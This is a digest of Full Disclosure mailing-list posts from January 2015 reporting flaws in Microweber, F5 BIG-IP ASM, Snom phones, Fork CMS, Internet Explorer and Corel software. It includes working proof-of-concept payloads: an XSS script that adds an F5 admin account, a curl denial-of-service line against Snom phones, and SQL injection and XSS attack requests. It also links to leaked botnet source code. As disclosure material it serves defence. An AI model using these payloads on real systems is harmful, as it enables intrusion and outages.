[FD] MS14-080 CVE-2014-6365 Technical Details Without "Nonsense"

2015-01-12 Thread Diéyǔ 

Origin:
Visit https://technet.microsoft.com/library/security/ms14-080
Go to "Acknowledgments" part and search for "CVE-2014-6365"
It says "Dieyu" - that's me.

Technical Details:
"Internet Explorer XSS Filter Bypass Vulnerability" is done by...
1. Inject "a href" link into target page.
(Not script, allowed by filter)
2. User clicks this injected link.
(Clickjacking etc)
3. URL of this injected link puts script into page.
(Filter does not kill it)
(Because it's transaction of the same domain)

Social Activities:
1. Greetings
David Ross "dross".
2. Hey, if you love my hacking, please reply "nice".
(I do this for free. Love to hear from my readers.)
3. My LinkedIn page: https://www.linkedin.com/in/liuzhiyong
(You can add me there! Recently I took a new name.)
4. My ultimate "flaw": http://dieyu.org/
(You know my style. Comment is welcome!)

Regards,

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SQL Injection Vulnerability in Microweber 0.95

2015-01-12 Thread ITAS Team 
# Exploit Title:   SQL Injection Vulnerability in Microweber 0.95

# Vendor:   https://microweber.com/

# Download link:  https://microweber.com/download
(https://github.com/microweber/microweber)

# CVE ID:  CVE-2014-9464

# Vulnerability: SQL Injection

# Affected version: Version 0.95 before 12/09/2014.

# Fixed version:Version 0.95 updated on 12/11/2014

# Author: Pham Kien Cuong (cuong.k.p...@itas.vn) & ITAS
Team (www.itas.vn)

 

::VULNERABILITY DETAIL::

- A SQL injection vulnerability has been found and confirmed within the
Microweber CMS as an anonymous user. A successful attack could allow an
anonymous attacker to access information such as username and password
hashes, or other private information  that are stored in the database. The
following URL and parameter have been confirmed to suffer from SQL
injection.

 

- Attack vector: 

GET /shop/category:[SQL INJECTION HERE] HTTP/1.1

Host: target.org

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://target/shop

Cookie: mw-time546209978=2015-01-05+05%3A19%3A53;
PHPSESSID=48500cad98b9fa857b9d82216afe0275

Connection: keep-alive

 

- Vulnerable file:   microweber-master/src/Microweber/Category.php

- Vulnerable function:   get_children($parent_id = 0, $type = false,
$visible_on_frontend = false)

- Vulnerable parameter:  $parent_id

- Vulnerable code: 

public function get_children($parent_id = 0, $type = false,
$visible_on_frontend = false)

{

 

$categories_id = intval($parent_id);

$cache_group = 'categories/' . $categories_id;

 

$table = $this->tables['categories'];

 

$db_t_content = $this->tables['content'];

 

if (isset($orderby) == false) {

$orderby = array();

//$orderby[0] = 'updated_on';

 

//$orderby[1] = 'DESC';

 

$orderby[0] = 'position';

 

$orderby[1] = 'asc';

}

 

if (intval($parent_id) == 0) {

 

return false;

}

 

$data = array();

 

$data['parent_id'] = $parent_id;

 

if ($type != FALSE) {

$data['data_type'] = $type;

} else {

$type = 'category_item';

$data['data_type'] = $type;

}

 

$cache_group = 'categories/' . $parent_id;

$q = " SELECT id,  parent_id FROM $table WHERE parent_id=$parent_id
";

$q_cache_id = __FUNCTION__ . crc32($q);

$save = $this->app->db->query($q, $q_cache_id, $cache_group);

if (empty($save)) {

return false;

}

$to_return = array();

if (is_array($save) and !empty($save)) {

foreach ($save as $item) {

$to_return[] = $item['id'];

}

}

 

$to_return = array_unique($to_return);

 

return $to_return;

}  

 

- Fix code: 

public function get_children($parent_id = 0, $type = false,
$visible_on_frontend = false)

{

$categories_id = $parent_id =intval($parent_id);

$cache_group = 'categories/' . $categories_id;

$table = $this->tables['categories'];

$db_t_content = $this->tables['content'];

if (isset($orderby) == false) {

$orderby = array();

//$orderby[0] = 'updated_on';

//$orderby[1] = 'DESC';

$orderby[0] = 'position';

$orderby[1] = 'asc';

}

if (intval($parent_id) == 0) {

return false;

}

$data = array();

$data['parent_id'] = $parent_id;

if ($type != FALSE) {

$data['data_type'] = $type;

} else {

$type = 'category_item';

$data['data_type'] = $type;

}

$cache_group = 'categories/' . $parent_id;

$q = " SELECT id, parent_id FROM $table WHERE
parent_id=$parent_id ";

$q_cache_id = __FUNCTION__ . crc32($q);

$save = $this->app->db->query($q, $q_cache_id,
$cache_group);

if (empty($save)) {

return false;

}

$to_return = array();

if (is_array($save) and !empty($save)) {

foreach ($save as $item) {

$to_return[] = $item['id'];

}

}

$to_return = array_unique($to_return);

return $to_return;

}

 

 

::SOLUTION::

Version 0.95 updated on 12/11/2014

Re: [FD] McAfee ePolicy Orchestrator Authenticated XXE and Credential Exposure

2015-01-12 Thread Tim 

Hi Brandon,

> I always assume if I have
> found a vulnerability, someone else has found it as well. 

Yes, you should.  For those out there who don't routinely find
vulnerabilities, it is hard for them to understand that these issues
aren't hard to find if you know what you're looking for.  Quite a few
bugs I've found in the past have been found by others independently
and published before I got around to it.  It happens a LOT more than
people think.


Also, I think companies that sell security software should be held to
a higher standard when it comes to fixing bugs.  What's the point in
buying security "solutions" if those solutions make you more
vulnerable?   If they currently can't turn around fixes for
vulnerabilities quickly, then they can:

A. Invest more in their release cycle so new releases can be put out
much more quickly.

B. Invest more in up-front security testing and Q/A, so they aren't
shipping vulnerable code to begin with.

C. Do both A and B


Preventing these bugs isn't black magic.  It isn't rocket surgery.
It's just a matter of getting business leaders to care about shipping
quality code.

tim

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Lizard Stresser rekt

2015-01-12 Thread Julius Kivimäki 
ayy lmao

//Julius Kivimäki, leader of Lizard Squad

2015-01-12 10:29 GMT+00:00 Robert Cavanaugh :

> Hi FD,
>
> I'm sure you're all sick to death of hearing about Lizard Squad and the
> skid marks they're leaving all over the place, so we'll make this brief:
> Lizard Squad has been rekt and the source code for their bots is now
> available for your viewing pleasure.
>
> https://github.com/pop-pop-ret/lizkebab
>
> 0wned by: Chippy1337, @packetprophet
>
> If you lulz'd, send BTC to 129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4
> 
>
> ___
> Sent through the Full Disclosure mailing list
> http://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] [Corrected] Stored XSS Vulnerability in F5 BIG-IP Application Security Manager

2015-01-12 Thread Peter Lapp 
Edit: Corrected the date in the timeline from 01/12/14 to 01/12/15.



Details
===

Product: F5 BIG-IP Application Security Manager (ASM)
Vulnerability: Cross Site Scripting
Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Likely 11.4.x-11.5.x.
Fixed Version: 11.6



Summary
===

The F5 ASM is a web application firewall designed to protect web
applications from attacks. It allows for a custom HTML page to be
displayed to end users when they trigger a violation. The
configuration page for the custom response contains a text input for
HTML and a "Show" button that allows the editor to preview the page.
This functionality is vulnerable to Cross Site Scripting.



Technical Details and POC
=

The HTML entered into the "Response Body" area is not sandboxed, which
allows a malicious user to include JavaScript that would run in the
context of the management console whenever a user clicks the "Show"
button. The user could use XHR to bypass CSRF protections and perform
commands on behalf of anyone that clicks the "Show" button.

Scenario:

1. A restricted user (Application Security Editor role) logs into the
management console of the ASM, enters Javascript to add a new user
(see below) into the "Response Body" input, and saves the page.

2. An admin logs on and previews the block page via the "Show" button.

3. The JS runs in the background, executes the XHR, and adds a new
admin user. The restricted user now has an admin account.

POC (Sloppy, I know):

var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange=
function()
{
if (xmlhttp.readyState==4)
{
var postrequest = new XMLHttpRequest();
xmlForm = xmlhttp.responseXML.getElementById('myform');
var timenowvalue = encodeURIComponent(xmlForm.elements['_timenow'].value);
var timebeforevalue =
encodeURIComponent(xmlForm.elements['_timenow_before'].value);
var bufvalue = encodeURIComponent(xmlForm.elements['_bufvalue'].value);
var bufvaluebefore =
encodeURIComponent(xmlForm.elements['_bufvalue_before'].value);
var parameters =
"_timenow="+timenowvalue+"&_timenow_before="+timebeforevalue+"&_bufvalue="+bufvalue+"&_bufvalue_before="+bufvaluebefore+"&_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Fuser%2Fcreate&handler_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&showObjList=shell_with_bash&showObjList_before=&hideObjList=partition_row%2Cshell_no_bash&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Fuser%2Fcreate&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&linked_add_id=&linked_add_id_before=&exit_page=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&exit_page_before=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&user_role_before=900&user_role_before_before=900&form_page=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&name=testadmin&name_before=&name_validation=NO_VALIDATION&name_required=1&passwd=testing123&passw
 
d_before=&passwd_validation=com.f5.form.PasswordValidator&passwd_validationparam1=passwd_confirm&passwd_required=1&passwd_confirm=testing123&passwd_confirm_before=&passwd_confirm_validation=NO_VALIDATION&passwd_confirm_required=1&user_role=0&user_role_before=900&shell_with_bash=bash&shell_with_bash_before=disable&exit_button_before=Cancel&repeat_before=Repeat&finished=Finished&finished_before=Finished";
postrequest.open("POST", "/tmui/Control/form", true)
postrequest.setRequestHeader("Content-type",
"application/x-www-form-urlencoded")
postrequest.send(parameters)
}
}
xmlhttp.open("GET", "/tmui/Control/jspmap/tmui/system/user/create.jsp", true);
xmlhttp.responseType = "document";
xmlhttp.send();




Solution


Upgrade to 11.6.
The vendor indicated the patch would not be backported to previous versions.


Timeline

06/09/14 - Reported issue to vendor
06/18/14 - Vendor confirms the vulnerability
07/18/14 - Vendor confirms the fix will be included in 11.6 and an SOL
would be created for the vulnerability
10/24/14 - Vendor confirms the fix was included in 11.6.0 but an SOL
was not created and the fix would not be backported.
01/12/15 - Released vulnerability info.

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Snom SIP phones denial of service through HTTP

2015-01-12 Thread Martin Schuhmacher 
Hi

i just did 

$ dd if=/dev/zero bs=1M count=32 | curl http://$IP/
Response: Unauthorized request

did i miss anything?

Firmware: snom360-SIP 8.7.4.8
not downloadable any more for some reason?

Yours
Martin

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Lizard Stresser rekt

2015-01-12 Thread Robert Cavanaugh 
Hi FD,

I'm sure you're all sick to death of hearing about Lizard Squad and the
skid marks they're leaving all over the place, so we'll make this brief:
Lizard Squad has been rekt and the source code for their bots is now
available for your viewing pleasure.

https://github.com/pop-pop-ret/lizkebab

0wned by: Chippy1337, @packetprophet

If you lulz'd, send BTC to 129UQoB3JvZg3iDERYZiXeHPkwT1iJF8u4


___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Stored XSS Vulnerability in F5 BIG-IP Application Security Manager

2015-01-12 Thread Peter Lapp 
Details
===

Product: F5 BIG-IP Application Security Manager (ASM)
Vulnerability: Cross Site Scripting
Author: Peter Lapp, lapp...@gmail.com
CVE: None assigned
Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Likely 11.4.x-11.5.x.
Fixed Version: 11.6



Summary
===

The F5 ASM is a web application firewall designed to protect web
applications from attacks. It allows for a custom HTML page to be displayed
to end users when they trigger a violation. The configuration page for the
custom response contains a text input for HTML and a "Show" button that
allows the editor to preview the page. This functionality is vulnerable to
Cross Site Scripting.



Technical Details and POC
=

The HTML entered into the "Response Body" area is not sandboxed, which
allows a malicious user to include JavaScript that would run in the context
of the management console whenever a user clicks the "Show" button. The
user could use XHR to bypass CSRF protections and perform commands on
behalf of anyone that clicks the "Show" button.

Scenario:

1. A restricted user (Application Security Editor role) logs into the
management console of the ASM, enters Javascript to add a new user (see
below) into the "Response Body" input, and saves the page.

2. An admin logs on and previews the block page via the "Show" button.

3. The JS runs in the background, executes the XHR, and adds a new admin
user. The restricted user now has an admin account.

POC (Sloppy, I know):

var xmlhttp = new XMLHttpRequest();
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4)
{
var postrequest = new XMLHttpRequest();
xmlForm = xmlhttp.responseXML.getElementById('myform');
var timenowvalue = encodeURIComponent(xmlForm.elements['_timenow'].value);
var timebeforevalue =
encodeURIComponent(xmlForm.elements['_timenow_before'].value);
var bufvalue = encodeURIComponent(xmlForm.elements['_bufvalue'].value);
var bufvaluebefore =
encodeURIComponent(xmlForm.elements['_bufvalue_before'].value);
var parameters =
"_timenow="+timenowvalue+"&_timenow_before="+timebeforevalue+"&_bufvalue="+bufvalue+"&_bufvalue_before="+bufvaluebefore+"&_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Fuser%2Fcreate&handler_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&showObjList=shell_with_bash&showObjList_before=&hideObjList=partition_row%2Cshell_no_bash&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Fuser%2Fcreate&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate&linked_add_id=&linked_add_id_before=&exit_page=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&exit_page_before=%2Ftmui%2Fsystem%2Fuser%2Flist.jsp&user_role_before=900&user_role_before_before=900&form_page=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Fuser%2Fcreate.jsp%3F&name=testadmin&name_before=&name_validation=NO_VALIDATION&name_required=1&passwd=testing123&passw
 
d_before=&passwd_validation=com.f5.form.PasswordValidator&passwd_validationparam1=passwd_confirm&passwd_required=1&passwd_confirm=testing123&passwd_confirm_before=&passwd_confirm_validation=NO_VALIDATION&passwd_confirm_required=1&user_role=0&user_role_before=900&shell_with_bash=bash&shell_with_bash_before=disable&exit_button_before=Cancel&repeat_before=Repeat&finished=Finished&finished_before=Finished";
postrequest.open("POST", "/tmui/Control/form", true)
postrequest.setRequestHeader("Content-type",
"application/x-www-form-urlencoded")
postrequest.send(parameters)
}
}
xmlhttp.open("GET", "/tmui/Control/jspmap/tmui/system/user/create.jsp",
true);
xmlhttp.responseType = "document";
xmlhttp.send();




Solution


Upgrade to 11.6.
The vendor indicated the patch would not be backported to previous versions.


Timeline

06/09/14 - Reported issue to vendor
06/18/14 - Vendor confirms the vulnerability
07/18/14 - Vendor confirms the fix will be included in 11.6 and an SOL
would be created for the vulnerability
10/24/14 - Vendor confirms the fix was included in 11.6.0 but an SOL was
not created and the fix would not be backported.
01/12/14 - Released vulnerability info.

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Snom SIP phones denial of service through HTTP

2015-01-12 Thread kape...@googlemail.com 
Snom SIP phones (www.snom.com) have a builtin HTTP/HTTPS configuration
interface, which is enabled by default.

By making a single HTTP POST request all available memory (and CPU) can be
exhausted, resulting in a reboot of the phone.
This even works if the HTTP/HTTPS interface is protected by username and
password (probably the credentials are checked a few more lines later when
the complete request has been received).

Affected models: MP, 3XX, 7XX, 8XX (i didnt have any of the other models to
test)
Affected firmwares: latest stable, latest beta (most likely some others too)
Workaround: Disable HTTP/HTTPS interface completely.

Poc:

dd if=/dev/zero bs=1M count=32 | curl http://IP_OF_PHONE
 --data-binary @-

P.S. Just if you are wondering I did not notify the vendor about this.
Almost two years ago i reported multiple vulnerabilities directly to the
vendor (including the possibility to install arbitrary software on the
device), but not much has changed since then.

___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] XSS Vulnerability in Fork CMS 3.8.3

2015-01-12 Thread ITAS Team 
# Exploit Title: XSS Vulnerability in Fork CMS 3.8.3

# Google Dork: N/A

# Date: 12/26/2014

# Exploit Author: Le Ngoc phi (phi.n...@itas.vn) and ITAS Team (www.itas.vn)

# Vendor Homepage: http://www.fork-cms.com

# Software Link: http://www.fork-cms.com/blog/detail/fork-3.8.4-released

# Version: Fork 3.8.3

# Tested on: N/A

# CVE : CVE-2014-9470 

 

 

::VULNERABILITY DETAIL::

- Vulnerable parameter:  q_widget

- Vulnerable file:   src/Frontend/Modules/Search/Actions/Index.php

- Vulnerable function:   loadForm()

 

- Attack vector:  

  

GET
/en/search?form=search&q_widget="onmouseover="alert('XSS')"&submit=Search
HTTP/1.1

Host: forkcms.local

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101
Firefox/34.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B;
__utma=23748525.1232410121.1415937482.1419392332.1419480017.3;
__utmz=23748525.1419480017.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic
|utmctr=(not%20provided);
track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B;
frontend_language=s%3A2%3A%22en%22%3B; _ga=GA1.2.1232410121.1415937482;
PHPSESSID=gailpg881ubvtsmroh2p1bfqn5

Connection: keep-alive

 

- Vulnerable code:

private function loadForm()

{

// create form

$this->frm = new FrontendForm('search', null, 'get', null, false);

 

// could also have been submitted by our widget

if (!\SpoonFilter::getGetValue('q', null, '')) {

$_GET['q'] = \SpoonFilter::getGetValue('q_widget', null, '');

}

 

// create elements

$this->frm->addText(

'q',

null,

255,

'inputText liveSuggest autoComplete',

'inputTextError liveSuggest autoComplete'

);

 

// since we know the term just here we should set the canonical url
here

$canonicalUrl = SITE_URL .
FrontendNavigation::getURLForBlock('Search');

if (isset($_GET['q']) && $_GET['q'] != '') {

$canonicalUrl .= '?q=' . $_GET['q'];

}

$this->header->setCanonicalUrl($canonicalUrl);

}

 

 

 

::DISCLOSURE::

- 12/25/2014: Detected vulnerability

- 12/25/2014: Inform vendor and the vendor confirmed

- 12/26/2014: Vendor releases patch

- 12/26/2014: ITAS Team publishes information

 

::REFERENCE::

-
http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerabi
lity-in-fork-cms-70.html

- https://github.com/forkcms/forkcms/issues/1018s

-
https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d
872114

 

::DISCLAIMER::

THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY
IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE
OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS
A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION
OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS,
AND AT THE USER'S OWN RISK.





ITAS Team


ITAS Corp.   Be protected with us 
Office : 24 Dang Thai Mai St., Ward 7, Phu Nhuan District, HCMC.
Tel : +84 - 8 - 38931952   Hotline :
0903445711
Email :    i...@itas.vn
 www.itas.vn

 

 


___
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Corel Software DLL Hijacking

2015-01-12 Thread CORE Security Technologies Advisories-team (jrv) 
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Corel Software DLL Hijacking



1. *Advisory Information*

Title: Corel Software DLL Hijacking
Advisory ID: CORE-2015-0001
Advisory URL:
http://www.coresecurity.com/advisories/corel-software-dll-hijacking
Date published: 2015-01-12
Date of last update: 2015-01-06
Vendors contacted: Corel
Release mode: User release



2. *Vulnerability Information*

Class: Uncontrolled Search Path Element [CWE-427]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-8393, CVE-2014-8394, CVE-2014-8395, CVE-2014-8396,
CVE-2014-8397, CVE-2014-8398



3. *Vulnerability Description*


  Corel [1] has developed a wide range of products that
  includes graphics, painting, photo, video and office software.
(CorelDRAW,Corel
  Photo-Paint, Corel PaintShop Pro, Corel CAD, Corel Painter, Corel PDF
  Fusion, Corel VideoStudio and Corel FastFlick among others)



  When a file associated with the Corel software is opened, the
directory of that
  document is first used to locate DLLs, which could allow an
attacker to execute
  arbitrary commands by inserting malicious DLLs into the same
directory as the
  document.



4. *Vulnerable packages*

   . Corel DRAW X7 [2]
   . Corel Photo-Paint X7 [3]
   . Corel PaintShop Pro X7 [7]
   . Corel CAD 2014 [4]
   . Corel Painter 2015 [5]
   . Corel PDF Fusion [6]
   . Corel VideoStudio PRO X7 [8]
   . Corel FastFlick [9]

Other versions could be affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*


Given that this is a client-side vulnerability, affected users
should avoid
opening untrusted files whose extensions are associated with
Corel software
and contain any of the DLL files detailed below.
  


6. *Credits*


  This vulnerability was discovered and researched by Marcos
Accossatto from Core Security
  Exploit Writers Team. The publication of this advisory was
coordinated by
  Joaquin Rodriguez Varela from Core Advisories Team.



7. *Technical Description / Proof of Concept Code*

[CVE-2014-8393] This vulnerability is caused by a DLL Hijacking when a file
  associated with any of the following Corel applications is
executed (CorelDRAW X7, Corel
  Photo-Paint X7, Corel PaintShop Pro X7, Corel Painter 2015 or
Corel PDF Fusion). The
  affected application should not be running for the vulnerability
to work. The Corel
  software looks for a DLL file called "wintab32.dll" and does not
control its path,
  therefore allowing to copy a malicious DLL file with the same name
inside the folder
  where the associated file is. The DLL is executed within the
context of the application.


[CVE-2014-8394] This vulnerability is caused by a DLL Hijacking when a file
  associated with Corel CAD 2014 is executed. Corel CAD 2014 should
not be running before
  the associated file is executed for the vulnerability to work.
Corel CAD looks for a DLL
  file called "FxManagedCommands_3.08_9.tx" or "TD_Mgd_3.08_9.dll"
and does not control their
  path, therefore allowing to copy a malicious DLL file with the
same name of either DLL
  inside the folder where the associated file is. The DLL is
executed within the context of
  the application.


[CVE-2014-8395] This vulnerability is caused by a DLL Hijacking when a file
  associated with Corel Painter 2015 is executed. Corel Painter 2015
should not be running
  before the associated file is executed for the vulnerability to
work. Corel Painter looks
  for a DLL file called "wacommt.dll" and does not control its path,
therefore allowing to
  copy a malicious DLL file with the same name inside the folder
where the associated file
  is. The DLL is executed within the context of the application.


[CVE-2014-8396] This vulnerability is caused by a DLL Hijacking when a file
  associated with Corel PDF Fusion is executed. Corel PDF Fusion
should not be running
  before the associated file is executed for the vulnerability to
work. Corel PDF Fusion
  looks for a DLL file called "quserex.dll" and does not control its
path, therefore
  allowing to copy a malicious DLL file with the same name inside
the folder where the
  associated file is. The DLL is executed within the context of the
application.


[CVE-2014-8397] This vulnerability is caused by a DLL Hijacking when a file
  associated with Corel VideoStudio PRO X7 or Corel FastFlix is
executed. Corel Video
  Studio or Corel FastFlix should not be running before the
associated file is executed
  for the vulnerability to work. Corel PDF Fusion looks for a DLL
file called "u32ZLib.dll"
  and does not control its path, therefore allowing to copy a
malicious DLL file with the
  same name inside the folder where the associated file is. The DLL
is executed within the
  context of

[FD] Corel Software DLL Hijacking

2015-01-12 Thread CORE Advisories Team 
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Corel Software DLL Hijacking



1. *Advisory Information*

Title: Corel Software DLL Hijacking
Advisory ID: CORE-2015-0001
Advisory URL:
http://www.coresecurity.com/advisories/corel-software-dll-hijacking
Date published: 2015-01-12
Date of last update: 2015-01-06
Vendors contacted: Corel
Release mode: User release



2. *Vulnerability Information*

Class: Uncontrolled Search Path Element [CWE-427]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-8393, CVE-2014-8394, CVE-2014-8395, CVE-2014-8396,
CVE-2014-8397, CVE-2014-8398



3. *Vulnerability Description*


Corel [1] has developed a wide range of products that includes graphics,
painting,
photo, video and office software.(CorelDRAW,Corel Photo-Paint, Corel
PaintShop Pro, Corel CAD,
Corel Painter, Corel PDF Fusion, Corel VideoStudio and Corel FastFlick
among others)
   


When a file associated with the Corel software is opened, the directory
of that document
is first used to locate DLLs, which could allow an attacker to execute
arbitrary commands
by inserting malicious DLLs into the same directory as the document.
   


4. *Vulnerable packages*

   . Corel DRAW X7 [2]
   . Corel Photo-Paint X7 [3]
   . Corel PaintShop Pro X7 [7]
   . Corel CAD 2014 [4]
   . Corel Painter 2015 [5]
   . Corel PDF Fusion [6]
   . Corel VideoStudio PRO X7 [8]
   . Corel FastFlick [9]

Other versions could be affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*


Given that this is a client-side vulnerability, affected users should
avoid opening untrusted
files whose extensions are associated with Corel software and contain
any of the DLL files detailed below.
 


6. *Credits*


This vulnerability was discovered and researched by Marcos Accossatto
from Core Security
Exploit Writers Team. The publication of this advisory was coordinated
by Joaquin Rodriguez
Varela from Core Advisories Team.
   


7. *Technical Description / Proof of Concept Code*

[CVE-2014-8393] This vulnerability is caused by a DLL Hijacking when a file
associated with any of the following Corel applications is executed
(CorelDRAW X7, Corel
 Photo-Paint X7, Corel PaintShop Pro X7, Corel Painter 2015 or Corel PDF
Fusion). The
affected application should not be running for the vulnerability to
work. The Corel
software looks for a DLL file called "wintab32.dll" and does not control
its path, therefore
 allowing to copy a malicious DLL file with the same name inside the
folder where the
associated file is. The DLL is executed within the context of the
application.
   

[CVE-2014-8394] This vulnerability is caused by a DLL Hijacking when a file
associated with Corel CAD 2014 is executed. Corel CAD 2014 should not be
running before
the associated file is executed for the vulnerability to work.
Corel CAD looks for a DLL file called "FxManagedCommands_3.08_9.tx" or
"TD_Mgd_3.08_9.dll"
and does not control their path, therefore allowing to copy a malicious
DLL file with the
same name of either DLL inside the folder where the associated file is.
The DLL is
executed within the context of the application.
   

[CVE-2014-8395] This vulnerability is caused by a DLL Hijacking when a
file associated with
Corel Painter 2015 is executed. Corel Painter 2015 should not be running
before the associated
file is executed for the vulnerability to work. Corel Painter looks for
a DLL file called
"wacommt.dll" and does not control its path, therefore allowing to copy
a malicious DLL file
with the same name inside the folder where the associated file is. The
DLL is executed within
the context of the application.
   

[CVE-2014-8396] This vulnerability is caused by a DLL Hijacking when a
file associated with
Corel PDF Fusion is executed. Corel PDF Fusion should not be running
before the associated
file is executed for the vulnerability to work. Corel PDF Fusion looks
for a DLL file called
"quserex.dll" and does not control its path, therefore allowing to copy
a malicious DLL file
with the same name inside the folder where the associated file is. The
DLL is executed within
the context of the application.
   

[CVE-2014-8397] This vulnerability is caused by a DLL Hijacking when a
file associated with
Corel VideoStudio PRO X7 or Corel FastFlix is executed. Corel Video
Studio or Corel FastFlix
should not be running before the associated file is executed for the
vulnerability to work.
Corel PDF Fusion looks for a DLL file called "u32ZLib.dll" and does not
control its path,
therefore allowing to copy a malicious DLL file with the same name
inside the folder where the
associated file is. The DLL is executed within the context of the
application.
   

[CVE-2014-8398] This vulnerability is caused by a DLL Hijacking when a
file associated with
Corel FastFlick is executed. Corel FastFlick should not be running
before the associated file
is executed for the vulnerability to work. Corel FastFlic

[FD] Corel Software DLL Hijacking

2015-01-12 Thread CORE Advisories Team 
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/

Corel Software DLL Hijacking



1. *Advisory Information*

Title: Corel Software DLL Hijacking
Advisory ID: CORE-2015-0001
Advisory URL:
http://www.coresecurity.com/advisories/corel-software-dll-hijacking
Date published: 2015-01-12
Date of last update: 2015-01-06
Vendors contacted: Corel
Release mode: User release



2. *Vulnerability Information*

Class: Uncontrolled Search Path Element [CWE-427]
Impact: Code execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-8393, CVE-2014-8394, CVE-2014-8395, CVE-2014-8396,
CVE-2014-8397, CVE-2014-8398



3. *Vulnerability Description*


Corel [1] has developed a wide range of products that includes graphics, 
painting, 
photo, video and office software.(CorelDRAW,Corel Photo-Paint, Corel PaintShop 
Pro, Corel CAD,
Corel Painter, Corel PDF Fusion, Corel VideoStudio and Corel FastFlick among 
others)



When a file associated with the Corel software is opened, the directory of that 
document
is first used to locate DLLs, which could allow an attacker to execute 
arbitrary commands
by inserting malicious DLLs into the same directory as the document.



4. *Vulnerable packages*

   . Corel DRAW X7 [2]
   . Corel Photo-Paint X7 [3]
   . Corel PaintShop Pro X7 [7]
   . Corel CAD 2014 [4]
   . Corel Painter 2015 [5]
   . Corel PDF Fusion [6]
   . Corel VideoStudio PRO X7 [8]
   . Corel FastFlick [9]

Other versions could be affected too, but they were not checked.


5. *Vendor Information, Solutions and Workarounds*


Given that this is a client-side vulnerability, affected users should avoid 
opening untrusted
files whose extensions are associated with Corel software and contain any of 
the DLL files detailed below.
  


6. *Credits*


This vulnerability was discovered and researched by Marcos Accossatto from Core 
Security
Exploit Writers Team. The publication of this advisory was coordinated by 
Joaquin Rodriguez
Varela from Core Advisories Team.



